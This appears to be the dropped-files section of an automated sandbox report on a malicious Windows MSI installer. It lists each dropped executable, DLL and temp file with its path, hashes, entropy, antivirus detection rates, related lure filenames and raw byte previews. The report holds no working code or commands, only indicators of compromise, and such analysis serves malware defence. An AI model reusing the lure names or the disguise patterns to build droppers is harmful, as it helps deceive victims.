                                                                    Preview:..5....\..).X.rBA..F..3^,..p.U%#O.5....q.a..U.G.......o....5...*....&O.:....T..z...d.....[.....k.8S....0..{W$HP.b2&E....u..x..,l[T.0]..Q.[*..X_,7`...m.@....@...u....r..E....P.:[.{.\.X..&>..r._ue..Y.......^....x... 4\.u.....D-...v.z.M...1.q..j.....9*a'...Y..fL)...,442$pw .|7mu....$.s..od..Bl.....@...qo.#.....n.!.I....*B.a.DA...sv.>.;..$D....`c....TiI%.-..h.>..6}]e..7..y?.5...10W13.,]&^U\.O.).a.9.s..).4*.h...LV..z9..0...F.M......S{..~.rki....Q..&.#.f3....Ob......(...m...B.Q...m.p..W....zj.=..J.6.8....t..6.......R.,m...<(m.J....1.....g...j..a........,.._....P...t.....K..|~D.%.8.zLC{...P.....{W.U..z:.k........U..D@....Q....T.V....p..Mo..B.)#.'...nu:..o....o..H..j.X.........6... (wq.K. ..K.@.....I.fK..a.4..P.wcS.... .b..'C7....ha..3.S..(.fH'.(.Jj.;...Wq8..c........7.{.7.E..-l.t.!.P.6..&:...r7.-z...|Pm.8.6.~..L..r.Z.A.o*Q......@.L...q.2 %..f.G.^...S...A/.Q.n..Rq..".VQG!..n..[:X>..5....v.L.c..zc.F.Y.p..m..>.+9..G...,g6.U..;B)..Mp.....H?F....k.\.co|....

                                                                    C:\Users\user\Pictures\fotosdaviagem\windows10.exe

                                                                    Download File
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):1626280
                                                                    Entropy (8bit):7.371352775782398
                                                                    Encrypted:false
                                                                    SSDEEP:49152:H4jyNKd2Bqc8Y7IDbauSVGDzhGjThGDzhmj8L5NsmK2:H4Fd2Bqc8Y7IDbauSVGDzhGjThGDzhmL
                                                                    MD5:BDC0CFF1E6E3DB489864041A623F0D1E
                                                                    SHA1:CF1BEEEC71ABBFBE8A6F47ABAAA6C1AF2FEE37DC
                                                                    SHA-256:585741CA3C4041BB39D107F1F159D908650967FBCCAC3A491BCA389CC4BA0769
                                                                    SHA-512:AEAF1D2DA43584AE91EA032C59A945AB91F721CC3B5BB98C2C7096DFD8C728B4EBF735491E06E934B4B1C9F1CCC719F950AD6F45E212F638B52C7AF5EFCC18DB
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 3%
                                                                    • Antivirus: Virustotal, Detection: 5%, Browse
                                                                    Joe Sandbox View:
                                                                    • Filename: NF_e_07_2024_XML__.msi, Detection: malicious, Browse
                                                                    • Filename: CrzA2u67LQ.msi, Detection: malicious, Browse
                                                                    • Filename: z1Pedido-Faturado-NF-938731.cmd, Detection: malicious, Browse
                                                                    • Filename: arquivo.msi, Detection: malicious, Browse
                                                                    • Filename: z1Intimacao-eletronica.msi, Detection: malicious, Browse
                                                                    • Filename: Nota.msi, Detection: malicious, Browse
                                                                    Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..........................................@..............................................@........................... .../... .......................p..p............................`......................................................CODE................................ ..`DATA....p...........................@...BSS......................................idata.../... ...0..................@....tls.........P.......0...................rdata.......`.......0..............@..P.reloc..p....p.......2..............@..P.rsrc........ ......................@..P....................................@..P........................................................................................................................................

                                                                    C:\Windows\Installer\49d147.msi

                                                                    Download File
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Sep 18 15:06:51 2020, Security: 0, Code page: 1252, Revision Number: {32FF458D-4EB8-49EA-9D5C-9471CB31AE21}, Number of Words: 10, Subject: Aplicativo Windows, Author: Microsoft, Name of Creating Application: Aplicativo Windows, Template: ;1046, Comments: Aplicativo Windows, Title: Installation Database, Keywords: Installer, MSI, Database, Create Time/Date: Sun Jun 9 21:40:35 2024, Number of Pages: 200
                                                                    Category:dropped
                                                                    Size (bytes):31124992
                                                                    Entropy (8bit):7.9796246302652145
                                                                    Encrypted:false
                                                                    SSDEEP:786432:Ln1stHfbfy4zTE8R0BPtNg1LfjlszEJZ:GHfO4zTB8qF+zEJZ
                                                                    MD5:5421CD4BBB277EFC5B163A75CAC629FF
                                                                    SHA1:0D20C0BB978DAD6BBD9065EBFC20680C241AC1E0
                                                                    SHA-256:29772A95FB3ED50319DC74F8BE52963EE621DC151CCD94B10EA14A7123C268F7
                                                                    SHA-512:C8446D76F4EC65BC3D6A3174407F88E377C8AA260CCBED083653D114271A81A91F166A7AB45CA3D1CBDF9917F8B5AEBE87364DA210B9160607F2FE59A76D893C
                                                                    Malicious:false
                                                                    Preview:......................>.......................................................G.......c.......v...............................P...Q...R...S...T...U...V...W...X...........................................................................................................................................................................................................................................................................................................................................................................=...................$...5....................................................................................... ...!..."...#...,...%...&...'...(...)...*...+...-.......3.../...0...1...2...6...4...>...A...7...8...9...:...;...<...........?...@.......B...C...D...E...F...........I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

                                                                    C:\Windows\Installer\MSID686.tmp

                                                                    Download File
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):601920
                                                                    Entropy (8bit):6.469032452979565
                                                                    Encrypted:false
                                                                    SSDEEP:12288:g+zdBoU6TPAjp66Ulgc2zGz5gCxOWIGvn:HBoBTopk1QGz53sWIGvn
                                                                    MD5:CADBCF6F5A0199ECC0220CE23A860D89
                                                                    SHA1:073C149D68916520AEA882E588AB9A5AE083D75A
                                                                    SHA-256:42EF18C42FE06709F3C86157E2270358F3C93D14BE2E173B8FAE8EDCEFDDFCA0
                                                                    SHA-512:CEBB128BDC04E6B29DF74BEDCC375A340AC037563D828AF3455DE41F31D2E464F82F85C97CA9910A4A7C819EFA906AA4A4560174F184CEE316F53E3D2B5CDCCC
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    • Antivirus: Virustotal, Detection: 1%, Browse
                                                                    Joe Sandbox View:
                                                                    • Filename: CrzA2u67LQ.msi, Detection: malicious, Browse
                                                                    • Filename: HomeDesk.msi, Detection: malicious, Browse
                                                                    • Filename: z1Pedido-Faturado-NF-938731.cmd, Detection: malicious, Browse
                                                                    • Filename: arquivo.msi, Detection: malicious, Browse
                                                                    • Filename: 25690.01808D.msi, Detection: malicious, Browse
                                                                    • Filename: fatKCMAGKKH.msi, Detection: malicious, Browse
                                                                    • Filename: SPMServer_2024.3.5.473.exe, Detection: malicious, Browse
                                                                    • Filename: SPMServer_2024.2.1.7.exe, Detection: malicious, Browse
                                                                    • Filename: SPMServer_2024.3.1.22.exe, Detection: malicious, Browse
                                                                    • Filename: Df.mes-25664.msi, Detection: malicious, Browse
                                                                    Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......|.J.8.$.8.$.8.$...'.5.$...!.$.. .).$..'./.$..!.r.$... .!.$...".9.$...%...$.8.%.$...-.R.$...$.9.$.....9.$.8...9.$...&.9.$.Rich8.$.........................PE..L...R+Jd.........."!...#.<...........W.......P...............................0......5R....@..........................W..d....a..,.......................@=...... h......p..............................@............P..l............................text....:.......<.................. ..`.rdata..:,...P.......@..............@..@.data... %...........n..............@....rsrc................~..............@..@.reloc.. h.......j..................@..B........................................................................................................................................................................................................................................................................

                                                                    C:\Windows\Installer\MSID6F5.tmp

                                                                    Download File
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):601920
                                                                    Entropy (8bit):6.469032452979565
                                                                    Encrypted:false
                                                                    SSDEEP:12288:g+zdBoU6TPAjp66Ulgc2zGz5gCxOWIGvn:HBoBTopk1QGz53sWIGvn
                                                                    MD5:CADBCF6F5A0199ECC0220CE23A860D89
                                                                    SHA1:073C149D68916520AEA882E588AB9A5AE083D75A
                                                                    SHA-256:42EF18C42FE06709F3C86157E2270358F3C93D14BE2E173B8FAE8EDCEFDDFCA0
                                                                    SHA-512:CEBB128BDC04E6B29DF74BEDCC375A340AC037563D828AF3455DE41F31D2E464F82F85C97CA9910A4A7C819EFA906AA4A4560174F184CEE316F53E3D2B5CDCCC
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    • Antivirus: Virustotal, Detection: 1%, Browse
                                                                    Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......|.J.8.$.8.$.8.$...'.5.$...!.$.. .).$..'./.$..!.r.$... .!.$...".9.$...%...$.8.%.$...-.R.$...$.9.$.....9.$.8...9.$...&.9.$.Rich8.$.........................PE..L...R+Jd.........."!...#.<...........W.......P...............................0......5R....@..........................W..d....a..,.......................@=...... h......p..............................@............P..l............................text....:.......<.................. ..`.rdata..:,...P.......@..............@..@.data... %...........n..............@....rsrc................~..............@..@.reloc.. h.......j..................@..B........................................................................................................................................................................................................................................................................

                                                                    C:\Windows\Installer\MSID754.tmp

                                                                    Download File
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):601920
                                                                    Entropy (8bit):6.469032452979565
                                                                    Encrypted:false
                                                                    SSDEEP:12288:g+zdBoU6TPAjp66Ulgc2zGz5gCxOWIGvn:HBoBTopk1QGz53sWIGvn
                                                                    MD5:CADBCF6F5A0199ECC0220CE23A860D89
                                                                    SHA1:073C149D68916520AEA882E588AB9A5AE083D75A
                                                                    SHA-256:42EF18C42FE06709F3C86157E2270358F3C93D14BE2E173B8FAE8EDCEFDDFCA0
                                                                    SHA-512:CEBB128BDC04E6B29DF74BEDCC375A340AC037563D828AF3455DE41F31D2E464F82F85C97CA9910A4A7C819EFA906AA4A4560174F184CEE316F53E3D2B5CDCCC
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    • Antivirus: Virustotal, Detection: 1%, Browse
                                                                    Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......|.J.8.$.8.$.8.$...'.5.$...!.$.. .).$..'./.$..!.r.$... .!.$...".9.$...%...$.8.%.$...-.R.$...$.9.$.....9.$.8...9.$...&.9.$.Rich8.$.........................PE..L...R+Jd.........."!...#.<...........W.......P...............................0......5R....@..........................W..d....a..,.......................@=...... h......p..............................@............P..l............................text....:.......<.................. ..`.rdata..:,...P.......@..............@..@.data... %...........n..............@....rsrc................~..............@..@.reloc.. h.......j..................@..B........................................................................................................................................................................................................................................................................

                                                                    C:\Windows\Installer\MSID783.tmp

                                                                    Download File
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):601920
                                                                    Entropy (8bit):6.469032452979565
                                                                    Encrypted:false
                                                                    SSDEEP:12288:g+zdBoU6TPAjp66Ulgc2zGz5gCxOWIGvn:HBoBTopk1QGz53sWIGvn
                                                                    MD5:CADBCF6F5A0199ECC0220CE23A860D89
                                                                    SHA1:073C149D68916520AEA882E588AB9A5AE083D75A
                                                                    SHA-256:42EF18C42FE06709F3C86157E2270358F3C93D14BE2E173B8FAE8EDCEFDDFCA0
                                                                    SHA-512:CEBB128BDC04E6B29DF74BEDCC375A340AC037563D828AF3455DE41F31D2E464F82F85C97CA9910A4A7C819EFA906AA4A4560174F184CEE316F53E3D2B5CDCCC
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    • Antivirus: Virustotal, Detection: 1%, Browse
                                                                    Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......|.J.8.$.8.$.8.$...'.5.$...!.$.. .).$..'./.$..!.r.$... .!.$...".9.$...%...$.8.%.$...-.R.$...$.9.$.....9.$.8...9.$...&.9.$.Rich8.$.........................PE..L...R+Jd.........."!...#.<...........W.......P...............................0......5R....@..........................W..d....a..,.......................@=...... h......p..............................@............P..l............................text....:.......<.................. ..`.rdata..:,...P.......@..............@..@.data... %...........n..............@....rsrc................~..............@..@.reloc.. h.......j..................@..B........................................................................................................................................................................................................................................................................

                                                                    C:\Windows\Installer\MSID7D3.tmp

                                                                    Download File
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):601920
                                                                    Entropy (8bit):6.469032452979565
                                                                    Encrypted:false
                                                                    SSDEEP:12288:g+zdBoU6TPAjp66Ulgc2zGz5gCxOWIGvn:HBoBTopk1QGz53sWIGvn
                                                                    MD5:CADBCF6F5A0199ECC0220CE23A860D89
                                                                    SHA1:073C149D68916520AEA882E588AB9A5AE083D75A
                                                                    SHA-256:42EF18C42FE06709F3C86157E2270358F3C93D14BE2E173B8FAE8EDCEFDDFCA0
                                                                    SHA-512:CEBB128BDC04E6B29DF74BEDCC375A340AC037563D828AF3455DE41F31D2E464F82F85C97CA9910A4A7C819EFA906AA4A4560174F184CEE316F53E3D2B5CDCCC
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    • Antivirus: Virustotal, Detection: 1%, Browse
                                                                    Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......|.J.8.$.8.$.8.$...'.5.$...!.$.. .).$..'./.$..!.r.$... .!.$...".9.$...%...$.8.%.$...-.R.$...$.9.$.....9.$.8...9.$...&.9.$.Rich8.$.........................PE..L...R+Jd.........."!...#.<...........W.......P...............................0......5R....@..........................W..d....a..,.......................@=...... h......p..............................@............P..l............................text....:.......<.................. ..`.rdata..:,...P.......@..............@..@.data... %...........n..............@....rsrc................~..............@..@.reloc.. h.......j..................@..B........................................................................................................................................................................................................................................................................

                                                                    C:\Windows\Installer\MSID8CE.tmp

                                                                    Download File
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):856995
                                                                    Entropy (8bit):6.562536377822231
                                                                    Encrypted:false
                                                                    SSDEEP:24576:Q/EEimJH6g7scSzMQDC5lfCY/EEimJH6g7scSzMQDC5lfCk:SOmJH6g7sJzM+C5ZCaOmJH6g7sJzM+CX
                                                                    MD5:17B4C858EFC2042FE699799285EDFE75
                                                                    SHA1:1764FB5C6022DF773E99A6809CF327A3462EB31C
                                                                    SHA-256:A6AD50CF63B3D075A5DE37B0731173724FC59ABEA18027D808249F6DCA10A4D6
                                                                    SHA-512:843079919475A55A6D1260C5C453D7A398F5E1CD4FD303D10BBA51D46F3E2AC45C5A45DB155DDEB458B5E09606B6D2A545E1F675D383EBCA13C5817168E497C8
                                                                    Malicious:false
                                                                    Preview:...@IXOS.@.....@...X.@.....@.....@.....@.....@.....@......&.{5DF9F6C2-148A-4336-9D2A-77B6884D39DA}..Aplicativo Windows..hBqTrQLya4.msi.@.....@?....@.....@........&.{32FF458D-4EB8-49EA-9D5C-9471CB31AE21}.....@.....@.....@.....@.......@.....@.....@.......@......Aplicativo Windows......Rollback..A.....o. .d.e. .r.e.s.t.a.u.r.a.....o.....RollbackCleanup..Removendo arquivos de backup..Arquivo: [1]...@.......@........ProcessComponents%.Atualizando o registro de componentes...@!....@.....@.]....&.{60715A9F-4AEC-4D83-B87A-914CE6AF84AD}..C:\Users\user\Documents\.@.......@.....@.....@......&.{232B65CE-07F2-4C09-8446-D0B152043BFA}1.01:\Software\Microsoft\Aplicativo Windows\Version.@.......@.....@.....@......&.{22B4B4EB-20D3-4CCD-A51F-EBD421917779}..01:\Microsoft\.@.......@.....@.....@......&.{3A6531DD-7594-4904-AAB9-32F10FD461DF}..01:\Microsoft\Windows\.@.......@.....@.....@......&.{4669957E-4874-4408-AF9D-19502B394F45}%.01:\Microsoft\Windows\CurrentVersion\.@.......@.....@.....@......&.{7FA

                                                                    C:\Windows\Installer\MSIDD62.tmp

                                                                    Download File
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):423936
                                                                    Entropy (8bit):6.554049394581909
                                                                    Encrypted:false
                                                                    SSDEEP:12288:B/ePEitwJH6g7scgFzMzMHf7h453V6hEFM:B/EEimJH6g7scSzMQDC5lfC
                                                                    MD5:768B35409005592DE2333371C6253BC8
                                                                    SHA1:E370B3CFD801FCDFDBEEC90B0F7CBEF5D2E6B69C
                                                                    SHA-256:33B519696A7F4B5D4714E3A363B0F0F76E6FF576A05999E482EA484AD4ACF5A5
                                                                    SHA-512:BB8FAE0FDCE3D61DAB48C1F79F3CE498159364D51FDFD2481CCA3A60D009F6134194D48EA20DE3E1F0C236BB9F6368F82D737A8153F7A1D492F44E197EA971CE
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    • Antivirus: Virustotal, Detection: 0%, Browse
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........5.g[..g[..g[.T.X..g[.T.^.)g[.8._..g[.8.X..g[.8.^..g[.T._..g[.T.]..g[.T.Z..g[..gZ.Kg[.^.R..g[.^....g[..g..g[.^.Y..g[.Rich.g[.................PE..L...s,Jd.........."....#..........................@.................................._....@..........................................p..8........................:..(...p...........................h...@...............l............................text.............................. ..`.rdata...R.......T..................@..@.data....7...0......................@....rsrc...8....p.......0..............@..@.reloc...:.......<...<..............@..B........................................................................................................................................................................................................................................................................................

                                                                    C:\Windows\Installer\MSIDD92.tmp

                                                                    Download File
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):423936
                                                                    Entropy (8bit):6.554049394581909
                                                                    Encrypted:false
                                                                    SSDEEP:12288:B/ePEitwJH6g7scgFzMzMHf7h453V6hEFM:B/EEimJH6g7scSzMQDC5lfC
                                                                    MD5:768B35409005592DE2333371C6253BC8
                                                                    SHA1:E370B3CFD801FCDFDBEEC90B0F7CBEF5D2E6B69C
                                                                    SHA-256:33B519696A7F4B5D4714E3A363B0F0F76E6FF576A05999E482EA484AD4ACF5A5
                                                                    SHA-512:BB8FAE0FDCE3D61DAB48C1F79F3CE498159364D51FDFD2481CCA3A60D009F6134194D48EA20DE3E1F0C236BB9F6368F82D737A8153F7A1D492F44E197EA971CE
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    • Antivirus: Virustotal, Detection: 0%, Browse
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........5.g[..g[..g[.T.X..g[.T.^.)g[.8._..g[.8.X..g[.8.^..g[.T._..g[.T.]..g[.T.Z..g[..gZ.Kg[.^.R..g[.^....g[..g..g[.^.Y..g[.Rich.g[.................PE..L...s,Jd.........."....#..........................@.................................._....@..........................................p..8........................:..(...p...........................h...@...............l............................text.............................. ..`.rdata...R.......T..................@..@.data....7...0......................@....rsrc...8....p.......0..............@..@.reloc...:.......<...<..............@..B........................................................................................................................................................................................................................................................................................

                                                                    C:\Windows\Installer\SourceHash{5DF9F6C2-148A-4336-9D2A-77B6884D39DA}

                                                                    Download File
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:Composite Document File V2 Document, Cannot read section info
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):1.1646265592897085
                                                                    Encrypted:false
                                                                    SSDEEP:12:JSbX72Fj6liAGiLIlHVRpZh/7777777777777777777777777vDHFyIRetVZMuiV:JLQI5txRetVG3iF
                                                                    MD5:B348D50A5EBD1FC20BDB2A954975E90C
                                                                    SHA1:3D6F53141F1DDBEB5ED8286DE604BDB55FD77ADC
                                                                    SHA-256:123C76DAACD54B8F781A53F091C5D6F1F418DFEC603D21BBC8DAF34D3DDDEFA2
                                                                    SHA-512:C1317A677636E5ED9166855182177FF11CB27F05AE27CB953D0F2B6C5346CFCC96F193746C426F9D2BE3B810DF2F186E1B32B0AC53587657A289CB984DBFCCD7
                                                                    Malicious:false
                                                                    Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Windows\Installer\inprogressinstallinfo.ipi

                                                                    Download File
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:Composite Document File V2 Document, Cannot read section info
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):1.500686578197496
                                                                    Encrypted:false
                                                                    SSDEEP:48:i8PhQuRc06WXJMjT5LYHTQIIS+IKAE+lCyjMHMOIIS+IATk:NhQ1vjTuHTQIIrIRZlC0MsOIIrIV
                                                                    MD5:4F3F06645AAF82E11FEC7D7316D9F1B1
                                                                    SHA1:2A4403CECFC6565C09C35D271738350B492ED1D6
                                                                    SHA-256:25538D9E15D5031309229C46D81181B48A624F82F0FD8F2989647747C8FEE6D9
                                                                    SHA-512:BBBEE804E9C990C00FB1DF146AD08E0BA55A5EA68AB8C876307BC0F7C22731DCB6B4CA6E5D29AD507DBF8DAD3DBA895E39752A80E28C84C7210DE7E03776F52C
                                                                    Malicious:false
                                                                    Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log

                                                                    Download File
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):360001
                                                                    Entropy (8bit):5.362959720932598
                                                                    Encrypted:false
                                                                    SSDEEP:1536:6qELG7gK+RaOOp3LCCpfmLgYI66xgFF9Sq8K6MAS2OMUHl6Gin327D22A26Kgauc:zTtbmkExhMJCIpEN
                                                                    MD5:81E0D20D7C8F136729896744EC090FF3
                                                                    SHA1:D0D3413A0BD009DBB96D1074C7D6F2CBB4C01B96
                                                                    SHA-256:5DE0CFD4C8F2A892FFC0E4DC9B746CFEC957CE999BBA1F46A1571D66D07A694F
                                                                    SHA-512:9E611285CDD9EE65E7233661265F7112BE0BC1468483EE277A1E8309172696EF8F294ABBF37547FE5635B52B61F74EBDED7484E1FC56C34C6C0BA14CE35449E0
                                                                    Malicious:false
                                                                    Preview:.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..12/07/2019 14:54:22.458 [5488]: Command line: D:\wd\compilerTemp\BMT.200yuild.1bk\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe executeQueuedItems /nologo ..12/07/2019 14:54:22.473 [5488]: Executing command from offline queue: install "System.Runtime.WindowsRuntime.UI.Xaml, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=msil" /NoDependencies /queue:1..12/07/2019 14:54:22.490 [5488]: Executing command from offline queue: install "System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil" /NoDependencies /queue:3..12/07/2019 14:54:22.490 [5488]: Exclusion list entry found for System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil; it will not be installed..12/07/2019 14:54:22.490 [

                                                                    C:\Windows\Temp\~DF241ADDBC4C02AFC9.TMP

                                                                    Download File
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):512
                                                                    Entropy (8bit):0.0
                                                                    Encrypted:false
                                                                    SSDEEP:3::
                                                                    MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                    SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                    SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                    SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                    Malicious:false
                                                                    Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Windows\Temp\~DF4A498C4FFD0FDE69.TMP

                                                                    Download File
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):512
                                                                    Entropy (8bit):0.0
                                                                    Encrypted:false
                                                                    SSDEEP:3::
                                                                    MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                    SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                    SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                    SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                    Malicious:false
                                                                    Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Windows\Temp\~DF4ADF3DE45DF5E4EE.TMP

                                                                    Download File
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):512
                                                                    Entropy (8bit):0.0
                                                                    Encrypted:false
                                                                    SSDEEP:3::
                                                                    MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                    SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                    SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                    SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                    Malicious:false
                                                                    Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Windows\Temp\~DF592BA659561500F3.TMP

                                                                    Download File
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:Composite Document File V2 Document, Cannot read section info
                                                                    Category:dropped
                                                                    Size (bytes):32768
                                                                    Entropy (8bit):1.2073133061787735
                                                                    Encrypted:false
                                                                    SSDEEP:48:7nYu2I+CFXJnT5ZYHTQIIS+IKAE+lCyjMHMOIIS+IATk:zYq/TYHTQIIrIRZlC0MsOIIrIV
                                                                    MD5:6EE82AF99BA5BCD65B2C4B2DBC883083
                                                                    SHA1:CA03795DF2E945B7916C393FAE3C6EB05E2A0A15
                                                                    SHA-256:95905231CC1A8DA5CA197C4917584020FE243A28D741806986AF7A4D18A3AFBA
                                                                    SHA-512:44AD7053B619F70853700D1EFFF6A5644859092A6050E05B1919D8406FD503CBF43E868CCA2FB9B6590D1F27285F4B27B70ED4BF4F6AC62C80F4933A90BF21C3
                                                                    Malicious:false
                                                                    Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Windows\Temp\~DF70D04C7F19C6EB88.TMP

                                                                    Download File
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):73728
                                                                    Entropy (8bit):0.1136616503924325
                                                                    Encrypted:false
                                                                    SSDEEP:24:eisoETxQIIipVQISQIIipVQIKAEVQoyjCyjMHVqewGpS+O7Bj+b:ZETSIIS+IRIIS+IKAE+lCyjMHMPTBO
                                                                    MD5:15E82E80C4ABBE38FA13AF4289DD2D91
                                                                    SHA1:D794B32B5CBD9906333CED0754020BD9BEA0410A
                                                                    SHA-256:4974150DD9DD9C74B02362C74065EDE478F39DA7F5B411892F321BF9752DED7F
                                                                    SHA-512:61240D8CC9E2D2D41679ED7B582B1F1BE2A01100BC0F21A41601565CCFC382FF746D0BAFD2B8772516D64D7348AA74C6DBB4C75DD72A6A4DC19A977284CD7906
                                                                    Malicious:false
                                                                    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Windows\Temp\~DF71B7C96C1D5B936E.TMP

                                                                    Download File
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:Composite Document File V2 Document, Cannot read section info
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):1.500686578197496
                                                                    Encrypted:false
                                                                    SSDEEP:48:i8PhQuRc06WXJMjT5LYHTQIIS+IKAE+lCyjMHMOIIS+IATk:NhQ1vjTuHTQIIrIRZlC0MsOIIrIV
                                                                    MD5:4F3F06645AAF82E11FEC7D7316D9F1B1
                                                                    SHA1:2A4403CECFC6565C09C35D271738350B492ED1D6
                                                                    SHA-256:25538D9E15D5031309229C46D81181B48A624F82F0FD8F2989647747C8FEE6D9
                                                                    SHA-512:BBBEE804E9C990C00FB1DF146AD08E0BA55A5EA68AB8C876307BC0F7C22731DCB6B4CA6E5D29AD507DBF8DAD3DBA895E39752A80E28C84C7210DE7E03776F52C
                                                                    Malicious:false
